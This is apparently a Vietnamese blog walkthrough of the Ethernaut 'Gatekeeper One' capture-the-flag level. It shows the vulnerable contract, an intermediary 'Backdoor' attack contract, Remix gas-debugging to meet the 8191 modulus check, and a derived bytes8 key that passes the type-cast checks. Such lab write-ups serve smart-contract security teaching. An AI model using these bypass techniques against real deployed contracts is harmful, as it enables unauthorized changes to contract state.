KienDT

Talk is cheap. Show me the code.

The Ethernaut: 13 - Gatekeeper One

13. Gatekeeper One  ★★★★★

Note: hãy luôn chọn đúng version solidity và tắt chế độ Enable Optimization trên Remix, vì với mỗi version số lượng gas tiêu tốn có thể khác nhau. Đây là một kinh nghiệm đau thương của mình khi tốn cả ngày trời debug mà không biết lỗi nằm ở đâu.

Nhiệm vụ: vượt qua 3 cánh cổng và thay đổi địa chỉ của cửa vào

pragma solidity ^0.4.18;

contract GatekeeperOne {

 address public entrant;

 modifier gateOne() {
  require(msg.sender != tx.origin);
  _;
 }

 modifier gateTwo() {
  require(msg.gas % 8191 == 0);
  _;
 }

 modifier gateThree(bytes8 _gateKey) {
  require(uint32(_gateKey) == uint16(_gateKey));
  require(uint32(_gateKey) != uint64(_gateKey));
  require(uint32(_gateKey) == uint16(tx.origin));
  _;
 }

 function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
  entrant = tx.origin;
  return true;
 }
}

Phân tích & Solution

Ta sẽ phân tích cách vượt qua từng cửa một

Cửa số 1

modifier gateOne() {
 require(msg.sender != tx.origin);
 _;
}

tx.origin sẽ là địa chỉ nguồn nơi phát đi giao dịch, là một ai đó, msg.sender là địa chỉ gọi tới hàm hiện tại

Có nghĩa là, khi ta gọi trực tiếp một hàm contract thông thường thì msg.sendertx.origin là giống nhau, còn nếu ta gọi hàm đó thông qua một contract trung gian thì tx.origin vẫn sẽ là ta, nhưng msg.sender sẽ là contract trung gian.

Vì thế ta chỉ cần dùng một contract trung gian là có thể vượt qua cửa số 1.

Cửa số 2

modifier gateTwo() {
 require(msg.gas % 8191 == 0);
 _;
}

Đây chính là điều kiện khó nhằn nhất của bài, ta phải có kiến thức về debug contract để vượt qua nó. Trong bài này ta sẽ sử dụng Remix IDE để thực hiện.

Ta chuẩn bị contract trung gian như sau:

contract Backdoor {
 GatekeeperOne gk;

 function Backdoor (address _target) public {
  gk = GatekeeperOne(_target);
 }

 function enter(uint gaslimit, bytes8 key) public {
  gk.enter.gas(gaslimit)(key);
 }
}

trong đó _target là địa chỉ instance của bạn.

Ta sẽ switch qua môi trường là JavaScript VM và compile lại cả GateKeeperOneBackdoor contract để tiến hành debug.

Ta sẽ set cho hàm enterGate2 một số lượng gas đủ lớn là 500000 gas, _key thì tuỳ ý vì ta chưa động đến gateThree.

png

Ở đây tuy transaction gần như chắc chắn sẽ fail, tuy nhiên từ đó, ta sẽ tiến hành debug và quan sát xem cho đến khi check điều kiện require(msg.gas % 8191 == 0); của gate 2 chúng ta đã tốn mất bao nhiêu gas, để theo đó có thể setup số lượng gas chính xác nhất

png

Ta thấy rằng cho đến bước 61, tức lúc debug chỉ vào msg.gas, số lượng gas hiện tại là 499787 gas, step này tốn 2 gas, vậy tổng số lượng gas đã mất là 500000 - 499787 + 2 = 215

png

Do đó ta chỉ cần điều chỉnh số lượng gas là 215 + 8191*100=819315 là đủ, sở dĩ nhân với 100 để đảm bảo sau khi qua gate 2 ta vẫn còn đủ gas để đi tiếp vào gate 3:

png

chạy lại, ta thấy vẫn lỗi, tất nhiên rồi vì đã qua gate3 đâu, tuy nhiên nếu bật debug lên thì ta thấy là đã qua gate 2 rồi. Ngon.

Cửa số 3

Note: hãy switch lại môi trường Ropsten test net trước khi đến với cửa số 3 vì ta sẽ submit thực tế tại đây.

modifier gateThree(bytes8 _gateKey) {
 require(uint32(_gateKey) == uint16(_gateKey));
 require(uint32(_gateKey) != uint64(_gateKey));
 require(uint32(_gateKey) == uint16(tx.origin));
 _;
}

Mấy điều kiện khá là loằng ngoằng, haiz, đầu vào là một tham số _gateKey có kiểu dữ liệu là bytes8, tức 16 kí tự hexa.

Trước hết ta nhắc lại một lượt các giới hạn số nguyên trong solidity:

 • uint16: 0 tới 65535 (\(2^{16} - 1\))
 • uint32: 0 tới 4294967295 (\(2^{32} - 1\))
 • uint64: 0 tới 18446744073709551615 (\(2^{64} - 1\))

Khi ép kiểu thì nếu số đó lớn hơn giới hạn của kiểu dữ liệu, thì sẽ quay vòng trở lại từ số bé nhất.

Có nghĩa là, giả sử như ta ép kiểu uint16(x) thì kết quả ta nhận được sẽ là x % 65536

OK, quay trở lại bài toán, điều kiện thứ 3:

require(uint32(_gateKey) == uint16(tx.origin));

ở đây tx.origin chính là địa chỉ account của mình. Ở đây mình sử dụng địa chỉ của mình, các bạn hãy thay tương ứng với địa chỉ của các bạn.

Do việc tính toán với số lớn của javascript hơi củ chuối, nên mình dùng python để tính toán

Trước tiên ta sẽ tính uint16(tx.origin)

>>>int('0xf32fd9e7d64a3b90ce2e5563927eff2567ebd96b', 16) % 2**16
55659

Vậy thì từ require(uint32(_gateKey) == uint16(tx.origin)); ta có _gateKey sẽ có dạng \(2^{32}\times x + 55659\)

Điều kiện đầu tiên:

require(uint32(_gateKey) == uint16(_gateKey));

Ta thấy rằng với dạng \(2^{32} \times x + 55659\) thì điều kiện trên rõ ràng luôn đúng vì

\[ (2^{32} \times x + 55659) ~ mod ~ 2^{32} = (2^{32} \times x + 55659) ~ mod ~ 2^{16} = 55659 \]

nghĩa là chỉ cần một số đi quá chu kì của \(2^{32}\) một lượng nhỏ hơn \(2^{16}\) là ok

Điều kiện thứ 2:

require(uint32(_gateKey) != uint64(_gateKey));

Để đạt được điều kiện này ta chỉ cần một số đi quá giới hạn của uint32 nhưng chưa tới giới hạn của uint64, khi đó số đó sẽ quay trở lại rất nhỏ với uint32 nhưng vẫn còn rất lớn với uint64, thật vậy

\[ (2^{32} + 55659) ~ mod ~ 2^{64} = 4295022955 \
(2^{32} + 55659) ~ mod ~ 2^{32} = 55659 \]

Vậy nên ta chọn luôn số \(2^{32} + 55659\) và chuyển nó qua dạng hex là ok

>>> 2**32 + 55659
4295022955
>>>hex(4295022955)
'0x10000d96b'

vì chuỗi key là dạng bytes8, tức 16 ký tự hexa, ta sẽ thêm vài số 0 ở đầu để đảm bảo key dài 16 ký tự: 0x000000010000d96b thay key bằng chuỗi bên trên và submit

png

Kiểm tra lại xem entrant đã đổi thành địa chỉ của mình chưa ?

> await contract.entrant()
"0xf32fd9e7d64a3b90ce2e5563927eff2567ebd96b"

Submit && All done!

completed

Bình luận

Đây là một bài tập hết sức khó nhằn, yêu cầu rất nhiều kiến thức tổng hợp. Từ kiến thức về msg.sender, tx.origin, cho đến overflow dữ liệu, đồng thời phải biết cả debug transaction, hiểu về khái niệm gas trong giao dịch. Thực sự mình đánh giá đây là bài tập khó nhất của chuỗi CTF này.

Không hiểu sao phía BTC họ lại để 5/6 sao, chắc trêu =))

Enjoy coding!